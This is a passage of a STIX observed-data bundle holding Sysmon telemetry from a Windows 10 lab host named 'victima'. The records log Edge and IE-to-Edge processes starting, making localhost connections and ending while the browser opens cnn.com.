| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.114", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.62", | |
| "--initial-client-data=0x100,0x104,0x108,0xdc,0x19c,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b10-62e1-eb01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.432Z", | |
| "last_observed": "2022-07-27T14:26:24.432Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--62eb4263-1788-40cc-9571-3e617d3c6370", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.770Z", | |
| "modified": "2022-07-28T16:05:45.770Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2072", | |
| "--field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ec01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 6992, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 --field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072 /prefetch:2", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.671238757Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:28.244Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2072", | |
| "--field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ec01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.847Z", | |
| "last_observed": "2022-07-27T14:26:24.847Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b6b6a3ad-9df6-4213-8055-3ae48b9fb736", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.770Z", | |
| "modified": "2022-07-28T16:05:45.770Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2192", | |
| "--field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ee01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 8792, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072 /prefetch:3", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.672799431Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.244Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2192", | |
| "--field-trial-handle=2060,i,14806826609257005709,5072707065366704964,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ee01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.884Z", | |
| "last_observed": "2022-07-27T14:26:24.884Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b1cf151e-7e7d-4567-954b-4872a46ca14e", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.771Z", | |
| "modified": "2022-07-28T16:05:45.771Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:37.172419815Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:30.660Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50178, | |
| "dst_ref": "6", | |
| "src_port": 50179, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:oPKNYZpeTCeynL+tvcNaIbh7W3Q=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.857Z", | |
| "last_observed": "2022-07-27T14:26:24.857Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--c83b5e21-a67f-4404-8467-e5d7033123a1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.772Z", | |
| "modified": "2022-07-28T16:05:45.772Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:37.173049017Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:30.660Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50178, | |
| "dst_ref": "6", | |
| "src_port": 50179, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:oPKNYZpeTCeynL+tvcNaIbh7W3Q=", | |
| "direction": "ingress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.857Z", | |
| "last_observed": "2022-07-27T14:26:24.857Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--51e70885-6b66-46f2-9aba-ffdb1ccc4755", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.772Z", | |
| "modified": "2022-07-28T16:05:45.772Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:40.680117977Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:34.329Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:33.449Z", | |
| "last_observed": "2022-07-27T14:26:33.449Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d6f7f84a-3ca6-4fd1-ab4e-3165471a9549", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.772Z", | |
| "modified": "2022-07-28T16:05:45.772Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1002-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 1852, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.010962183Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1002-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.655Z", | |
| "last_observed": "2022-07-27T14:26:45.655Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--890bc014-cbc7-4863-83e6-f00f1cc268e8", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.773Z", | |
| "modified": "2022-07-28T16:05:45.773Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "pid": 1852, | |
| "binary_ref": "3", | |
| "creator_user_ref": "9" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "4", | |
| "ingested": "2022-07-27T14:26:54.012559139Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "9" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b25-62e1-1002-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "<unknown process>" | |
| }, | |
| "4": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
